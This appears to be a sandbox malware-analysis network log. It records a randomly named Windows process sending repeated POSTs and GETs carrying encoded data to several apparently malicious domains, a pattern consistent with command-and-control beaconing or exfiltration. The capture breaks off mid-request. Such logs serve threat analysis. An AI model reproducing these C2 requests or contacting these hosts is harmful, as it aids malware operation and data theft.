                      Timestamp | Bytes transferred | Direction | Data
                      Aug 23, 2024 08:28:14.401947021 CEST | 507 | OUT | GET /qpwk/?mV=ZpN4DLSXOzy8qX&Xn70_=Pn8OF1j/flre3VeYQ8gIXKcN0tGdbcqXadgaNymjhjlyVvhoWwCe/sZUerDBeXD1/Dp7mYeP8BtJLpf3hF/3m/h5NM1/Dot3Sot4/3V0qZLtTBV8KMhP3aG6aVWI0GSP3d0EJgo= HTTP/1.1
                      Host: www.anaidittrich.com
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Aug 23, 2024 08:28:15.077173948 CEST | 509 | IN | HTTP/1.1 301 Moved Permanently
                      Date: Fri, 23 Aug 2024 06:28:14 GMT
                      Server: Apache
                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                      Cache-Control: no-cache, must-revalidate, max-age=0
                      X-Redirect-By: WordPress
                      Upgrade: h2c
                      Connection: Upgrade, close
                      Location: http://anaidittrich.com/qpwk/?mV=ZpN4DLSXOzy8qX&Xn70_=Pn8OF1j/flre3VeYQ8gIXKcN0tGdbcqXadgaNymjhjlyVvhoWwCe/sZUerDBeXD1/Dp7mYeP8BtJLpf3hF/3m/h5NM1/Dot3Sot4/3V0qZLtTBV8KMhP3aG6aVWI0GSP3d0EJgo=
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      37 | 192.168.2.6 | 49759 | 64.64.237.133 | 80 | 6008 | C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Aug 23, 2024 08:28:20.587084055 CEST | 757 | OUT | POST /0or4/ HTTP/1.1
                      Host: www.551108k5.shop
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.551108k5.shop
                      Referer: http://www.551108k5.shop/0or4/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 210
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Ascii: Xn70_=NrV3WXumKEYrIbumllVcUqHCyr+EZyf0rps8hRZ5qZSvR0m4BJ5sY6TscSgnJKhePYVpZabP6kKtqd/JdPTGMxlORuWSokshbgApcJaN+uTXsTsrHs9Gz8VK7r4QDbEV9iVuG/6iwEStFfJgPV7pHACeophwTZoheCDaMGUzHSsFaeyaJv7PEdlU6zXJnn89yW0CrxL91Lz/
                      Aug 23, 2024 08:28:21.147763968 CEST | 401 | IN | HTTP/1.1 301 Moved Permanently
                      Server: nginx
                      Date: Fri, 23 Aug 2024 06:28:21 GMT
                      Content-Type: text/html
                      Content-Length: 162
                      Connection: close
                      Location: https://www.551108k5.shop/0or4/
                      Strict-Transport-Security: max-age=31536000
                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      38 | 192.168.2.6 | 49760 | 64.64.237.133 | 80 | 6008 | C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Aug 23, 2024 08:28:23.149094105 CEST | 781 | OUT | POST /0or4/ HTTP/1.1
                      Host: www.551108k5.shop
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.551108k5.shop
                      Referer: http://www.551108k5.shop/0or4/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 234
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Ascii: Xn70_=NrV3WXumKEYrJ7emnGNcTKHd3r+EQSfwroQ8hQtPqL2vRW+4AKhsf6TsJigoUahRPYYcZbnP6gitqfnJc4HHMhl2I+Wc10shbgApcIqj+u7XticrGIpJ6cVNsb4QSLFc9iVMG+nFwGqtFdBgPhnqewCclJgcdMV1RCWYIlwpcg4YWIzAVc7sWNFW6xP7nH8XwWMC5mHa6/WcZ/JLuSGddX8WksoDIxgBGg==
                      Aug 23, 2024 08:28:23.725356102 CEST | 401 | IN | HTTP/1.1 301 Moved Permanently
                      Server: nginx
                      Date: Fri, 23 Aug 2024 06:28:23 GMT
                      Content-Type: text/html
                      Content-Length: 162
                      Connection: close
                      Location: https://www.551108k5.shop/0or4/
                      Strict-Transport-Security: max-age=31536000
                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      39 | 192.168.2.6 | 49761 | 64.64.237.133 | 80 | 6008 | C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Aug 23, 2024 08:28:25.822999001 CEST | 1794 | OUT | POST /0or4/ HTTP/1.1
                      Host: www.551108k5.shop
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.551108k5.shop
                      Referer: http://www.551108k5.shop/0or4/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 1246
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Ascii: Xn70_= [TRUNCATED]
                      Aug 23, 2024 08:28:26.314662933 CEST | 401 | IN | HTTP/1.1 301 Moved Permanently
                      Server: nginx
                      Date: Fri, 23 Aug 2024 06:28:26 GMT
                      Content-Type: text/html
                      Content-Length: 162
                      Connection: close
                      Location: https://www.551108k5.shop/0or4/
                      Strict-Transport-Security: max-age=31536000
                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      40 | 192.168.2.6 | 49762 | 64.64.237.133 | 80 | 6008 | C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Aug 23, 2024 08:28:28.371917009 CEST | 504 | OUT | GET /0or4/?Xn70_=Ap9XVhmqGkofKqiV5m9YIo/+mNWQVB3yrZ4yzU5Yy+i7TWDOWZwNJN7AITR5XrxbOYEdZ4fD4Uqd39DYFcK8Ez1yK8yk0Eg6fz4eRdqrvJXc5ChZOexPycZL94MwDpFuqgEtJpY=&mV=ZpN4DLSXOzy8qX HTTP/1.1
                      Host: www.551108k5.shop
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Aug 23, 2024 08:28:28.948158979 CEST | 562 | IN | HTTP/1.1 301 Moved Permanently
                      Server: nginx
                      Date: Fri, 23 Aug 2024 06:28:28 GMT
                      Content-Type: text/html
                      Content-Length: 162
                      Connection: close
                      Location: https://www.551108k5.shop/0or4/?Xn70_=Ap9XVhmqGkofKqiV5m9YIo/+mNWQVB3yrZ4yzU5Yy+i7TWDOWZwNJN7AITR5XrxbOYEdZ4fD4Uqd39DYFcK8Ez1yK8yk0Eg6fz4eRdqrvJXc5ChZOexPycZL94MwDpFuqgEtJpY=&mV=ZpN4DLSXOzy8qX
                      Strict-Transport-Security: max-age=31536000
                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      41 | 192.168.2.6 | 49763 | 85.13.151.9 | 80 | 6008 | C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Aug 23, 2024 08:28:34.012171984 CEST | 778 | OUT | POST /gs9g/ HTTP/1.1
                      Host: www.datensicherung.email
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.datensicherung.email
                      Referer: http://www.datensicherung.email/gs9g/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 210
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Ascii: Xn70_=4v8DtKRH15LAOPGxT3MxNOFfYBPp+TvB2hGsVGIl7RwFlAUpYC62EdqJ9A4xTWZb2hpwTPVtnx1BOPV8amBJ9u2DW6WS0kamOD7vPwW2K3WTBQY4lbQobs3GrlFuPqKwqjQdWVccDsrCLkMdmlnRCio8Ld+BWPYYlAgmDJsNsfOyrHvTuy5W2kdkDy/t878Fobq9ZAHm7oG7
                      Aug 23, 2024 08:28:34.626193047 CEST | 360 | IN | HTTP/1.1 404 Not Found
                      Date: Fri, 23 Aug 2024 06:28:34 GMT
                      Server: Apache
                      Content-Length: 196
                      Connection: close
                      Content-Type: text/html; charset=iso-8859-1
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      42 | 192.168.2.6 | 49764 | 85.13.151.9 | 80 | 6008 | C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Aug 23, 2024 08:28:36.560061932 CEST | 802 | OUT | POST /gs9g/ HTTP/1.1
                      Host: www.datensicherung.email
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.datensicherung.email
                      Referer: http://www.datensicherung.email/gs9g/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 234
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Ascii: Xn70_=4v8DtKRH15LABPWxSWMxFOFcdBPp3zvF2hasVEl47koFmiMpKD62NNqJ1g4+e2ZU2h1OTO5tn1lBOOF8aVpO8+2BNqWU7EamOD7vPwycK3uTAhI4l6QnYs3ZhFFuF6KKqjQFWUwyDqvCLhodoQLQMio6Pd/JSM1fgmRAE78P3fO5qxuJyB51k09mDwnf8b8vqbS9LXLB0cjY2Czm1AxdGRoMnfbUA+BqpQ==
                      Aug 23, 2024 08:28:37.176605940 CEST | 360 | IN | HTTP/1.1 404 Not Found
                      Date: Fri, 23 Aug 2024 06:28:37 GMT
                      Server: Apache
                      Content-Length: 196
                      Connection: close
                      Content-Type: text/html; charset=iso-8859-1
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      43 | 192.168.2.6 | 49765 | 85.13.151.9 | 80 | 6008 | C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Aug 23, 2024 08:28:39.109108925 CEST | 1815 | OUT | POST /gs9g/ HTTP/1.1
                      Host: www.datensicherung.email
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.datensicherung.email
                      Referer: http://www.datensicherung.email/gs9g/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 1246
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Ascii: Xn70_=4v8DtKRH15LABPWxSWMxFOFcdBPp3zvF2hasVEl47kgFlXQpYku2fdqJpw55e2Zz2htSTOEWn3tBPsd8LEpO1+2BS6WR0ka3ODrRPwCcK3uTAiA4sLQnes3GrlFYPqLlqj4VWUEMDaPCLAUdlCzQEio4C9+PSM5QgmlmE+Bq3YO5mVTz2CxB/1RwbBvf1P8FqYrMKh+28t7Qx23612wJIQw1laeIUKMzzv74tmm0Y3lggLnk8VvO1JAUm53sxei6tJwH5WEvC23KddZQQFFSpNKNpqTMkpi7jf9bEnzIF7T5xf7dIp9LyE5VUkcVbejFf6JQ1w6ZbfVHxpplxgrxT9LZIdRMZdurJpFg/kQ1HKwBzeZFVIGMmZBMqG1UUPfJfnkl6IQ90Bly/94lW+3G4KG2AnYGtY2pTS+RuzUNDZL+4CxPKvBZtii7eaLqpYJVwPbHQShZYTkoa3IExR3cQE93XWMasBY/922Xx1PO8Y2CrbY+VhbiuKXVVsi+ZDccs3PV6XeIuAgYdnQ3k2Hcf04W7AwKT5BLvC48TANcL8CQQ+dHb6joJ/TszIduQUzCW3HLnpQd6DJ38xSEhQwNQabzcHxMSdleWAIlZYgk1kFBFWy9HF4pewmzO4VDs+I4a3ZpQXHJUjArTtnfE9lLFfiI0PYetgqyoaXvLOMn5LalXRF0G5fs/xEj2u8SqTc63JeQPIkK0ZuNXU/R7/WdTf7bRwi+OI5hN1of1rJtBwyn84sjlamxTcWqb15HRSDstT/iYHieRjFeS3OPio8fUYi+7LiHlBWcIWE28yHZVPkkgOSPN5lIczRu2/G7hoUtXzzP9pTdKPNUuua3niIkDbJwEgg3PJ51cxR/Grc58AsPBXHjgW+ACzugeg8pE3QSqcmzgKRZzuc66aHIxxQZsZLlhAq1NaCsIScL2eeD1hKIcGi9ANKqAMj2NOCNAqhOdGBvqQ16HiG3EuZZUnAbOewMoSyxSiXpvfFgYNBqT1sG4g [TRUNCATED]
                      Aug 23, 2024 08:28:39.750530958 CEST | 360 | IN | HTTP/1.1 404 Not Found
                      Date: Fri, 23 Aug 2024 06:28:39 GMT
                      Server: Apache
                      Content-Length: 196
                      Connection: close
                      Content-Type: text/html; charset=iso-8859-1
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      44 | 192.168.2.6 | 49766 | 85.13.151.9 | 80 | 6008 | C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Aug 23, 2024 08:28:41.650428057 CEST | 511 | OUT | GET /gs9g/?Xn70_=1tUju/dHge3HLZSdE2k0YsxyInHY2hrxyQikSChTyVI6tApcYR3Jee2z9yFvFCdZtAxjWN4NnVxgCMN8Nn90+uGeV46P8z2dJC38PhOXMX6lRwcpgLQeWu7EugNpVbCb7i9ISyk=&mV=ZpN4DLSXOzy8qX HTTP/1.1
                      Host: www.datensicherung.email
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Aug 23, 2024 08:28:42.288878918 CEST | 360 | IN | HTTP/1.1 404 Not Found
                      Date: Fri, 23 Aug 2024 06:28:42 GMT
                      Server: Apache
                      Content-Length: 196
                      Connection: close
                      Content-Type: text/html; charset=iso-8859-1
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      45 | 192.168.2.6 | 49767 | 172.67.215.136 | 80 | 6008 | C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Aug 23, 2024 08:28:48.017203093 CEST | 748 | OUT | POST /uhl0/ HTTP/1.1
                      Host: www.jiyitf.top
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.jiyitf.top
                      Referer: http://www.jiyitf.top/uhl0/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 210
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Ascii: Xn70_=qeu/xX/6/sVZ1D8OSLnh4NgxmkrD+lf2F0ShA+57hJ3zkIJm0NkDiu6DBUuFHwbVGj1ZUicxVfVu94eHHYfO2NLn03cDc73JM8HAGpaWZv/INA20XUhrcFvU3WbTJ8lhGv9t23MDGQu1ZmlVti/7CXg6qyYsu46ARFC3P5zpZ5FGuusK1vnP7PUEzbBelcVkTOBsvWKxHmd3


                      Session ID: 46  Source IP: 192.168.2.6  Source Port: 49768  Destination IP: 172.67.215.136  Destination Port: 80  PID: 6008  Process: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      Timestamp: Aug 23, 2024 08:28:50.561130047 CEST  Bytes transferred: 772  Direction: OUT  Data: POST /uhl0/ HTTP/1.1
                      Host: www.jiyitf.top
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.jiyitf.top
                      Referer: http://www.jiyitf.top/uhl0/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 234
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Ascii: Xn70_=qeu/xX/6/sVZ0iMOB8Th5tg2pErD3FfqF0OhA7Zrh7jzlqRm1MkDhu6DUkuMEAbOGjxRUn8xVfRu95OHAr3BwdLl4XcFRb3JM8HAGpOwZrTINRG0W2ZsfFvV+2bTN8ltGv9P22hsGWi1ZktVswH4IXg8uyZsn7boXlDSA6PLJL93i4tQpcnspf0GzZZsl8VORO5s9BGWIS4UUZMDiB/Yxo6T0vTK1Bg3lQ==


                      Session ID: 47  Source IP: 192.168.2.6  Source Port: 49769  Destination IP: 172.67.215.136  Destination Port: 80  PID: 6008  Process: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      Timestamp: Aug 23, 2024 08:28:53.113121986 CEST  Bytes transferred: 1785  Direction: OUT  Data: POST /uhl0/ HTTP/1.1
                      Host: www.jiyitf.top
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.jiyitf.top
                      Referer: http://www.jiyitf.top/uhl0/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 1246
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36


                      Session ID: 48  Source IP: 192.168.2.6  Source Port: 49770  Destination IP: 172.67.215.136  Destination Port: 80  PID: 6008  Process: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      Timestamp: Aug 23, 2024 08:28:55.650414944 CEST  Bytes transferred: 501  Direction: OUT  Data: GET /uhl0/?Xn70_=ncGfyjKG78FJ3RohSJv2gscu+FHk/nvAJl3DW65koN/XsollpddV5N2bVVuKdzPyIkh4e3ZVd/UrgbHQf7fI9cbDzTo3eIPvJ/69OYqbKv/aNBrOYFR5SHm/7G6NRslCZscJ8Q0=&mV=ZpN4DLSXOzy8qX HTTP/1.1
                      Host: www.jiyitf.top
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Timestamp: Aug 23, 2024 08:28:57.262368917 CEST  Bytes transferred: 1128  Direction: IN  Data: HTTP/1.1 404 Not Found
                      Date: Fri, 23 Aug 2024 06:28:57 GMT
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: close
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3PgWsCnBi2es6aZ7e8KlEO0oRyL%2F2KXT9jiiBh1JGMSAL6QJLc1KaBHdFZipqvev8TzOm5jlMvPYax1W4gSvW0MFv7b2f2hWYZgVPNB1JNHuuIKcR5I%2BQ2Uo9arhdu%2BYqg%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 8b790b9a6b2c72a4-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                      Session ID: 49  Source IP: 192.168.2.6  Source Port: 49772  Destination IP: 192.185.211.122  Destination Port: 80  PID: 6008  Process: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      Timestamp: Aug 23, 2024 08:29:02.311053991 CEST  Bytes transferred: 772  Direction: OUT  Data: POST /7o3y/ HTTP/1.1
                      Host: www.tadalaturbo.online
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.tadalaturbo.online
                      Referer: http://www.tadalaturbo.online/7o3y/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 210
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Ascii: Xn70_=66z2jmSSsQro/LJUgmYUe5EgOaXV91UAVmV8r4mj10olWspJs24cD/6wlbMOqRXij7RYn9ltdK6VsLXUhrkI9vrZeteA7S2DhJkND5chqyRgE3jZKSwhsbDSmjASdFrAn7jy9vpBPGM4/0dcKu676m6FW2EuNp3fg4bmUEQbo+RZWb1j56yvCiXl17RFSt0Qb0GHKYEgUsOO
                      Timestamp: Aug 23, 2024 08:29:02.797281027 CEST  Bytes transferred: 1121  Direction: IN  Data: HTTP/1.1 404 Not Found
                      Date: Fri, 23 Aug 2024 06:29:02 GMT
                      Server: Apache
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Last-Modified: Thu, 29 Sep 2022 21:53:06 GMT
                      Accept-Ranges: bytes
                      Vary: Accept-Encoding
                      Content-Encoding: gzip
                      Content-Length: 836
                      Content-Type: text/html


                      Session ID: 50  Source IP: 192.168.2.6  Source Port: 49773  Destination IP: 192.185.211.122  Destination Port: 80  PID: 6008  Process: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      Timestamp: Aug 23, 2024 08:29:04.854410887 CEST  Bytes transferred: 796  Direction: OUT  Data: POST /7o3y/ HTTP/1.1
                      Host: www.tadalaturbo.online
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.tadalaturbo.online
                      Referer: http://www.tadalaturbo.online/7o3y/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 234
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Ascii: Xn70_=66z2jmSSsQrotaZUwxMUcZEjA6XVkFUEVmR8r7rm1m8lVJNJiX4cE/6wirMPnxX5j7cnn5ttdKeVsJfU0KkL7/rbU9ee4i2DhJkND5YYqyZgEk7ZLwYuwLDRhjASZFrEn7jU9qwJPFk4/1tcN/64v26PamFEBpTTueSmeyQL/uBHXt05lJyMQy3n15J3SN06Z0+HYPIHbYrt68RsKXrryT1D6ZHte7Me2A==
                      Timestamp: Aug 23, 2024 08:29:05.344383001 CEST  Bytes transferred: 1121  Direction: IN  Data: HTTP/1.1 404 Not Found
                      Date: Fri, 23 Aug 2024 06:29:05 GMT
                      Server: Apache
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Last-Modified: Thu, 29 Sep 2022 21:53:06 GMT
                      Accept-Ranges: bytes
                      Vary: Accept-Encoding
                      Content-Encoding: gzip
                      Content-Length: 836
                      Content-Type: text/html


                      Session ID: 51  Source IP: 192.168.2.6  Source Port: 49774  Destination IP: 192.185.211.122  Destination Port: 80  PID: 6008  Process: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      Timestamp: Aug 23, 2024 08:29:07.403553963 CEST  Bytes transferred: 1809  Direction: OUT  Data: POST /7o3y/ HTTP/1.1
                      Host: www.tadalaturbo.online
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.tadalaturbo.online
                      Referer: http://www.tadalaturbo.online/7o3y/
